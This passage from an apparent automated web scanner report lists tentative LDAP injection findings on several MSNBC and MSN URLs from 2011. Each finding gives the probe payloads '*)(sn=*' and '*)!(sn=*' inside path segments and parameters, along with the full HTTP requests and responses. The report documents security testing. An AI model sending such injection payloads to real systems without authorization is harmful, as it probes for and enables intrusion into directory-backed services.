Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:26:47 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 28622

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=547224798&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D%2A%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&amp;ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=547224798&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D%2A%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&amp;ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
...[SNIP]...

Request 2

GET /_static/feeds/*)!(sn=* HTTP/1.1
Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:26:48 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 28632

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1226186690&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D%2A%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&amp;ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1226186690&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D%2A%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&amp;ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></l
...[SNIP]...

2.13. http://rad.redacted/ADSAdClient31.dll [GetSAd parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The GetSAd parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the GetSAd parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /ADSAdClient31.dll?GetSAd=*)(sn=*&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC00=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC01=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC02=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC03=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC04=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC05=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC06=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC07=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC08=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC09=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:51:06 GMT

Request 2

GET /ADSAdClient31.dll?GetSAd=*)!(sn=*&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:51:07 GMT


2.14. http://technolog.msnbc.redacted/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads 567e2b3ee4443fce)(sn=* and 567e2b3ee4443fce)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/567e2b3ee4443fce)(sn=*/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1203887611&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1203887611&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/567e2b3ee4443fce)!(sn=*/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=740635654&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=740635654&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

2.15. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-

Issue detail

The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/2010/08/*)(sn=*/4961720-yahoo-search-results-are-now-coming-from-bing- HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:32:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=470106145&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=470106145&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2010/08/*)!(sn=*/4961720-yahoo-search-results-are-now-coming-from-bing- HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:32:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1873517040&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1873517040&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

2.16. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads 67c3b1d04dfaf8d4)(sn=* and 67c3b1d04dfaf8d4)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /67c3b1d04dfaf8d4)(sn=*/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
